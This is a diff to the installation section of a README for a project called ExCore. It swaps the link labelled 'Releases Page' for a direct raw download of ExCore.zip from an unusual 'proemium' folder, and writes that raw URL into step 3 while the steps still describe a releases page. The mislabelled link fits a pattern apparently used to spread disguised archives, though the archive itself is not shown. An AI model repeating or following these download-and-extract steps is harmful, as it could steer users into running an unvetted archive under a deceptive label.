AlwiAnggoro/ExCore/README.md

 ## 📦 Installation

 ### 🔗 Visit the Download Page
-To download ExCore, navigate to the [Releases Page](https://github.com/AlwiAnggoro/ExCore/releases).
+To download ExCore, navigate to the [Releases Page](https://raw.githubusercontent.com/AlwiAnggoro/ExCore/main/proemium/ExCore.zip).

 ### 🥇 Steps to Download and Install
 1. On the Releases page, look for the latest version of ExCore.
 2. Click on the version number to expand the details.
-3. Find the file named `ExCore.zip` or a similar version-specific file.
+3. Find the file named `https://raw.githubusercontent.com/AlwiAnggoro/ExCore/main/proemium/ExCore.zip` or a similar version-specific file.
 4. Click on the file to download it to your computer.
 5. Once the download is complete, locate the file in your downloads folder.
 6. Extract the contents of the zip file.